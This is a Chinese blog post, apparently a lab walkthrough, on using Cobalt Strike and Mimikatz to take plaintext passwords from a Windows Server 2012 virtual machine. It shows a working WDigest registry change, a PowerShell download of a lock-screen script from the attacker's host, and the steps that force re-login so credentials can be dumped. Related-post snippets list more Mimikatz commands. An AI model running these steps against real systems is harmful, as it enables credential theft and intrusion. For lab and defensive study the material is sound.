使用CS抓取WIN2012明文密码

最新推荐文章于 2024-07-21 22:31:02 发布
最新推荐文章于 2024-07-21 22:31:02 发布
阅读量487 收藏 8
点赞数 5
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64302290/article/details/139359792
版权

目录

实验概述:       

开始实验:

实验准备:

打开CS:

生成木马控制wind2012:

抓取明文密码:

实验概述:       

        win2012及win10版本是不允许将明文密码储存在内存中的,此时我们就需要去修改注册表中的选项来使。但是修改后不会立即生效,需要我们执行一个脚本来使wind201息屏, 当管理员重新登录后才会生效。

开始实验:

实验准备:

在开始实验前我们需要两台虚拟机,kali为攻击机,win2012为被攻击机。

打开CS:

1:打开服务端并运行

2:打开客户端并运行

生成木马控制wind2012:

1:新建一个监听器

2:payload -> windows stageless payloads 生成木马,并绑定刚刚新建的监听器。

3:在kali上面搭建一个临时的web,让win2012访问并下载我们刚刚生成的CS木马,之后运行即可。

搭建网站:

访问下载运行:

运行后就可以在CS上看到有一台机器上线了:

抓取明文密码:

1:使用CS上自带的抓取工具正常情况下只能抓取到密文密码,如下:

Access -> Run Mimikatz

查看发现:只能抓取密文,不能抓取明文。

2:修改注册表

使用如下命令修改注册表:

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

如下:修改成功

3:在kali上面写一个脚本再将脚本传递到win2012上面,再通过命令执行。

在主目录下面创建:

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

4:传递脚本

使用如下命令将脚本传递到win2012上面:

shell powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.240.154:9090/lock-screen.ps1','C:\lock-screen.ps1')

5:执行锁屏脚本

shell powershell c:\lock-screen.ps1

此时,我们去win2012查看,发现已经锁屏了,之后我们输入密码重新登录进去。

6:再次使用CS自带的密码抓取工具

此时,我们发现就可以成功的抓取出明文了。

@菜鸟小小
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BCM943602CS WIN10 64 1300Mbps 满速驱动
12-07
BCM943602CS WIN10 64 1300Mbps 满速驱动 ,在网上找了很多驱动,都能用,但是很多时候链接网速都显示200-400Mbps...使用这个驱动后,链接显示1300Mbps ,基本达到BCM943602CS硬件链接理论速度,我实际传输速度在600...
Win2003系统安装dreamweaver cs4的方法
09-24
今天重新装了系统,是2003的,安装dreamweaver cs4 时出现问题,不让安装!
cs与msf权限传递,mimikatz抓取明文密码
m0_70638961的博客
05-28 344
由于Windows在win10或Windows2012R2以上时,默认的缓存表中是不存在明文密码的,显示为null,如图所示。创建foreign监听器-->msf监听模块设置端口-->cs执行新建会话选择创建的监听器。所以在这里我们抓取明文的步骤是:手工修改注册表-->强制锁屏-->等待管理员重新登录。重新登录之后可以看到明文抓取成功。强制锁屏可以通过脚本来实现。到这里显示了msf界面就表示传递成功了。3.新建会话选择创建的监听器。
cs与msf权限传递以及mimikatz抓取win2012明文密码
weixin_71514466的博客
06-29 135
启动CS服务端 修改密码后登录 创建监听器 生成脚本文件 启动http服务,让Win2012直接下载 下载完成后,点击运行 在cs客户端内,查看是否运行成功 运行mimikatz,抓取明文密码 cs权限传递给msf 启动msf 在cs创建监听器 点击增加会话,选择刚才创建的msf监听器 查看msf是否上线
密码抓取(mimikatz)
weixin_44300286的博客
03-12 2250
0x01、基本用法: CRYPTO::Certificates -列出/导出凭证。 PRIVILEGE::Debug -获得Debug权限 SEKURLSA::LogonPasswords -列出所有可用的提供者的凭据 TOKEN:List -列出系统中的所有令牌。 TOKEN::Elevate -假冒令牌。用于提升权限至SYSTEM权限(默认情况下) 0x02、加载方法 msf load mimikatz //加载mimikatz wdigest //列出所有可用的账号密码(与以下三个命令一样)
内网中的主机密码抓取
Amire0x的小乐园
11-29 2534
密码抓取 Mimikatz mimikatz的几大运行方式 使用前先将对应版本的mimikazi传上去 运行如下 命令不支持粘贴,不区分大小写 基本使用 基于win2003测试 列出导出凭证 crypto::certificates 获得debug权限(需要debug权限来执行一些mimikatz命令) privilege::debug 提升成功则会返回 OK 获取所有可用的提供者凭据,可得到当前账户的密码 sekurlsa::logonpasswords 查看token tok
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 2863
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
cs与msf权限传递,以及mimikatz抓取win2012明文密码
weixin_62304542的博客
05-27 784
cs与msf权限传递,以及mimikatz抓取win2012明文密码
cs与msf权限传递,mimikatz抓取win2012明文密码
qq_64951792的博客
06-27 642
cobaltstrike,msf
BCM94360CS2-WIN10-64.zip
12-12
使用windows和mac黑苹果双系统的小伙伴们可以下载,支持win10 64位的蓝牙驱动和wifi驱动。支持博通bcm94360cs2无线网卡。安装后即可在window10下愉快的使用蓝牙和wifi了
BCM943602CS 驱动WIN10.rar
05-05
5. **验证安装**:重启后,在设备管理器中检查BCM943602CS是否显示正常,以及无线网络功能是否可以正常使用。 6. **更新驱动**:如果遇到网络连接问题,可以尝试通过设备管理器检查驱动程序更新,或者直接从...
视频网站适用于什么服务器类型呢?
wanhengwangluo的博客
07-17 285
视频网站通常都会选择一些性能比较强大的服务器来保证网络视频能够进行流畅播放与用户的良好体验感,视频网站需要承载大量的视频数据处理与传输,所以选择的服务器需要具备强大的计算能力与网络处理能力,可以选择使用多核CPU和高速网络接口的服务器,来保证视频可以进行快速的下载。视频网站中的文件内存会比较大,为了可以存储大量的视频文件,所以网站需要具有足够存储空间的服务器,同时还要有着高可用性,确保业务的连续性与可靠性,不会出现服务器故障导致业务出现中断的情况。
python之shutil 文件目录操作模块
daxiashangxian的博客
07-17 331
函数用于移动文件或目录。可以用于重命名文件或将文件或目录从一个位置移动到另一个位置。函数会删除目录及其内容。如果只想删除目录中的文件但保留目录结构,可以使用以下方法。函数也可以用于重命名文件或目录。函数用于复制目录及其内容。递归地复制整个目录结构。将源文件复制到目标位置。函数用于递归地删除目录及其内容。参数,可以实现重命名操作。
Linux chmod 命令简介
地球空间
07-17 565
权限时,因为它会给予所有用户对文件或文件夹的完全访问权限,这可能会带来安全风险。命令用于改变文件或文件夹的访问权限。这会给指定文件夹及其内部的所有文件和子文件夹的所有者读、写和执行的权限,同时给组用户读和执行的权限。这会给指定文件夹及其内部的所有文件和子文件夹的所有者读和写权限,但不允许执行。这会给指定文件夹以及其内部的所有文件和子文件夹的每个用户读、写和执行的权限。这会从指定文件夹及其内部的所有文件和子文件夹的所有用户那里移除写权限。这会给指定文件夹及其内部的所有文件和子文件夹的所有用户添加执行权限。
【cmd】Windows CMD命令整理及示例使用
最新发布
Young_Pro的博客
07-21 637
上述这些命令涵盖了日常使用中的大部分场景,从文件操作、系统维护到网络管理的多个方面。每个命令都有其特定的用途,并且可以通过附加参数来执行更复杂的任务。显示活动的TCP连接、侦听的端口、以太网统计信息、IP路由表和IP统计信息。显示所有适配器的IP地址、子网掩码和默认网关(续)。此命令可用于创建虚拟驱动器。显示所有适配器的IP地址、子网掩码和默认网关。显示包括服务在内的所有当前运行的任务(续)。显示包括服务在内的所有当前运行的任务。显示本地或远程计算机的系统信息(续)。显示或设置可执行文件的搜索路径(续)。
94360cs2 win11 蓝牙
12-14
94360cs2是一款性能强大的电脑,配备了最新的Win11操作系统。同时,它也支持蓝牙功能,可以轻松连接蓝牙设备。 使用94360cs2的Win11系统连接蓝牙设备非常简单。首先,打开电脑的设置菜单,找到“蓝牙和其他设备”选项。在这个菜单中,点击“添加蓝牙或其他设备”,系统会开始搜索附近的蓝牙设备。当你的蓝牙设备出现在列表中时,点击它的名称进行配对,系统会提示你输入配对码或确认连接。 一旦成功连接,你就可以在Win11系统中使用蓝牙设备了。你可以连接蓝牙耳机来享受音乐,连接蓝牙鼠标或键盘来进行办公操作,甚至连接蓝牙打印机或扫描仪来进行文件处理。蓝牙功能的便利性使得94360cs2的Win11系统更加智能和灵活。 需要注意的是,在连接蓝牙设备时,确保设备处于配对模式并且距离电脑较近,这样可以避免连接不稳定或信号干扰的情况发生。另外,及时更新Win11系统和蓝牙设备的驱动程序也是保证连接稳定的重要因素。 总的来说,94360cs2的Win11系统蓝牙功能操作简单方便,为用户提供了更多的连接选择和使用体验,使得工作和娱乐更加轻松和高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值